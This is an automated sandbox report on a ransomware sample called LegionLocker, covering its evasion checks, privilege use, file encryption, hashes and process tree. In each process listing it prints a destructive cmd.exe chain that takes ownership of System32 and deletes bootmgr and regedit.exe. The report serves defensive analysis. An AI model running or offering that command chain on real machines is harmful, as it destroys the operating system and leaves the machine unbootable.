Malware Analysis Report

2024-11-13 18:04

Sample ID 241105-pkf8xa1brf
Target Ransomware LegionLocker.exe
SHA256 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412
Tags
themida discovery evasion exploit ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412

Threat Level: Known bad

The file Ransomware LegionLocker.exe was found to be: Known bad.

Malicious Activity Summary

themida discovery evasion exploit ransomware spyware stealer trojan

Renames multiple (465) files with added filename extension

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Renames multiple (153) files with added filename extension

Disables Task Manager via registry modification

Possible privilege escalation attempt

Modifies file permissions

Reads user/profile data of web browsers

Themida packer

Checks computer location settings

Checks BIOS information in registry

Checks whether UAC is enabled

Suspicious use of NtSetInformationThreadHideFromDebugger

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-05 12:23

Signatures

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-05 12:23

Reported

2024-11-05 12:25

Platform

win7-20240708-en

Max time kernel

140s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe N/A

Renames multiple (153) files with added filename extension

ransomware

Disables Task Manager via registry modification

evasion

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\takeown.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\takeown.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\takeown.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1724 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe C:\Windows\SysWOW64\cmd.exe
PID 1724 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe C:\Windows\SysWOW64\cmd.exe
PID 1724 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe C:\Windows\SysWOW64\cmd.exe
PID 1724 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe C:\Windows\SysWOW64\cmd.exe
PID 1908 wrote to memory of 2220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 1908 wrote to memory of 2220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 1908 wrote to memory of 2220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 1908 wrote to memory of 2220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 1908 wrote to memory of 2284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 1908 wrote to memory of 2284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 1908 wrote to memory of 2284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 1908 wrote to memory of 2284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 1908 wrote to memory of 588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 1908 wrote to memory of 588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 1908 wrote to memory of 588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 1908 wrote to memory of 588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 1908 wrote to memory of 636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 1908 wrote to memory of 636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 1908 wrote to memory of 636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 1908 wrote to memory of 636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 1908 wrote to memory of 844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 1908 wrote to memory of 844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 1908 wrote to memory of 844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 1908 wrote to memory of 844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe

"C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && Exit

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\System32 /grant Admin:F

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32\drivers

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\System32\drivers /grant Admin:F

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32\LogonUI.exe

Network

N/A

Files

memory/1724-0-0x0000000000F60000-0x0000000001790000-memory.dmp

memory/1724-1-0x0000000075201000-0x0000000075202000-memory.dmp

memory/1724-8-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-10-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-9-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-7-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-6-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-5-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-4-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-3-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-2-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-20-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-22-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-19-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-18-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-17-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-16-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-15-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-14-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-13-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-12-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-11-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-25-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-27-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-26-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-28-0x0000000000F60000-0x0000000001790000-memory.dmp

memory/1724-29-0x0000000000F60000-0x0000000001790000-memory.dmp

memory/1724-30-0x00000000751F0000-0x0000000075300000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\HOW-TO-DECRYPT.TXT

MD5 f2bbb85d6112bd7360a4ddbc23ea9a8b
SHA1 683eb7b2b0a5904337f204f71d25c02b9cc5daba
SHA256 be548e310dab08ae249c6d20ba64034d4f3568365d4d31e1f1262abb6c3f33f2
SHA512 a2bae503e9d18fc9bf1e981d2ec074f389a11e51e385f8701a14bc580c95b6c5f907baf9c7bf55e610d1582951fe7d93121b154fe532df6699389a77fcf6b172

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000005.log

MD5 2caa6f3c95f6ec6bba5b54344938efa0
SHA1 2d5637f50e858fbaaeec7853d944dd3c3e91ec39
SHA256 16ef853f2adc432c54ad75d0db8169be845065f65b6c5136eaafdcbe698ac1e6
SHA512 4141715b1d3a28a5fae1e3a1613cca697d07e24808da2b679abc5235d5a181799f35a0ce090ead8dcc133c3b7b7435b9805a3b9bc5eaca4f7167dab7c93d3e00

memory/1724-286-0x0000000000F60000-0x0000000001790000-memory.dmp

memory/1724-287-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-326-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-325-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-324-0x0000000075201000-0x0000000075202000-memory.dmp

memory/1724-328-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-327-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-329-0x00000000751F0000-0x0000000075300000-memory.dmp

C:\Users\Admin\Documents\RevokeUnpublish.xlsx

MD5 98320b7eb431a4d989a4cd3031e723b9
SHA1 7b59bc263c75bf899d4302d236b1c3806d87e3d1
SHA256 6591551d4d97286fb4d1af05cf82289fe0ef690b46c52e88458cf1d8d8ef580b
SHA512 27487d804f4162ef39bd0bdeccfe6b927b40ee2fea612af35982ff72a37ce823651d04a0037814fd63b3e71c28082196f2f3d31eb916e3bef6cf937804db9167

memory/1724-403-0x00000000751F0000-0x0000000075300000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-05 12:23

Reported

2024-11-05 12:25

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe N/A

Renames multiple (465) files with added filename extension

ransomware

Disables Task Manager via registry modification

evasion

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\takeown.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\takeown.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\takeown.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3928 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe C:\Windows\SysWOW64\cmd.exe
PID 3928 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe C:\Windows\SysWOW64\cmd.exe
PID 3928 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe C:\Windows\SysWOW64\cmd.exe
PID 2344 wrote to memory of 1748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 2344 wrote to memory of 1748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 2344 wrote to memory of 1748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 2344 wrote to memory of 4132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 2344 wrote to memory of 4132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 2344 wrote to memory of 4132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 2344 wrote to memory of 4864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 2344 wrote to memory of 4864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 2344 wrote to memory of 4864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 2344 wrote to memory of 704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 2344 wrote to memory of 704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 2344 wrote to memory of 704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 2344 wrote to memory of 3680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 2344 wrote to memory of 3680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 2344 wrote to memory of 3680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe

"C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && Exit

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\System32 /grant Admin:F

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32\drivers

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\System32\drivers /grant Admin:F

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32\LogonUI.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.30.10:443 g.bing.com tcp
US 8.8.8.8:53 10.30.171.150.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp

Files

memory/3928-0-0x0000000000720000-0x0000000000F50000-memory.dmp

memory/3928-1-0x0000000076A10000-0x0000000076A11000-memory.dmp

memory/3928-4-0x00000000769F0000-0x0000000076AE0000-memory.dmp

memory/3928-6-0x00000000769F0000-0x0000000076AE0000-memory.dmp

memory/3928-5-0x00000000769F0000-0x0000000076AE0000-memory.dmp

memory/3928-3-0x00000000769F0000-0x0000000076AE0000-memory.dmp

memory/3928-2-0x00000000769F0000-0x0000000076AE0000-memory.dmp

memory/3928-7-0x00000000769F0000-0x0000000076AE0000-memory.dmp

memory/3928-8-0x00000000769F0000-0x0000000076AE0000-memory.dmp

memory/3928-11-0x0000000000720000-0x0000000000F50000-memory.dmp

memory/3928-12-0x0000000000720000-0x0000000000F50000-memory.dmp

memory/3928-13-0x00000000061F0000-0x0000000006794000-memory.dmp

memory/3928-14-0x0000000005C40000-0x0000000005CD2000-memory.dmp

memory/3928-15-0x0000000005D00000-0x0000000005D0A000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\HOW-TO-DECRYPT.TXT

MD5 f2bbb85d6112bd7360a4ddbc23ea9a8b
SHA1 683eb7b2b0a5904337f204f71d25c02b9cc5daba
SHA256 be548e310dab08ae249c6d20ba64034d4f3568365d4d31e1f1262abb6c3f33f2
SHA512 a2bae503e9d18fc9bf1e981d2ec074f389a11e51e385f8701a14bc580c95b6c5f907baf9c7bf55e610d1582951fe7d93121b154fe532df6699389a77fcf6b172

memory/3928-64-0x0000000000720000-0x0000000000F50000-memory.dmp

memory/3928-101-0x00000000769F0000-0x0000000076AE0000-memory.dmp

memory/3928-102-0x00000000769F0000-0x0000000076AE0000-memory.dmp

memory/3928-136-0x0000000076A10000-0x0000000076A11000-memory.dmp

memory/3928-173-0x00000000769F0000-0x0000000076AE0000-memory.dmp

memory/3928-316-0x00000000769F0000-0x0000000076AE0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log

MD5 2caa6f3c95f6ec6bba5b54344938efa0
SHA1 2d5637f50e858fbaaeec7853d944dd3c3e91ec39
SHA256 16ef853f2adc432c54ad75d0db8169be845065f65b6c5136eaafdcbe698ac1e6
SHA512 4141715b1d3a28a5fae1e3a1613cca697d07e24808da2b679abc5235d5a181799f35a0ce090ead8dcc133c3b7b7435b9805a3b9bc5eaca4f7167dab7c93d3e00

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\winword.exe_Rules.xml

MD5 89b6590fcb9080db24875fa671b516ca
SHA1 20e472ccdba84d504e087418e703073f44c4f2d9
SHA256 d883bdee08b17e451d3be046fd7cd7b9c816c37f72fa123ca1c13c81e9fcd5ac
SHA512 3eea6d9796596d9d491b2fa1de794c33bda6447e11c611d769c32da6bd62f25d4b7b13748e70a601ae70f45eb36463d7080e16fcf80571e693109d9395345ee0

C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat

MD5 5090259c42fc6263bc00e952846280e8
SHA1 9bf53e854027c9dec3b25ff1164e88872c71f66e
SHA256 a05288aa086504a20d2a3177854f8eb158778756ebc24dcfca266c52fa8d5a17
SHA512 8b44fb8fade639c6b4d4b1f8747a8176652700a16b38e43f5f74403c2af0882fb6095986f8e4d94f3d5a242e8d49ed99a03361c01469c8c6a7bf7a7c3527ec7f